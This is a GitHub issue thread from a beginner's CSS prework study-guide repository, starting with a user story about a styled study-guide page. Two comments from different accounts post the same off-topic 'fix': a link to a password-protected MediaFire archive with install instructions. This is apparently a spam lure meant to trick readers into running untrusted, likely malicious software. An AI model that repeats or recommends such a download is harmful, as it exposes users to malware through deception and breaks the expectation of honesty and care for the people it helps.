### ISSUE TITLE
CSS

### ISSUE THREAD

**Issue by kavue** [kavue/prework-study-guide#2]
# CSS

## User Story
As a boot camp student
I want the prework notes to be structured on a webpage
So that I an easily find and read the information

## Acceptance Criteria 
GIVEN a Prework Study Guide website
WHEN I view the study guide
THEN I see a dark blue header and footer, and four boxes with a shadow

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
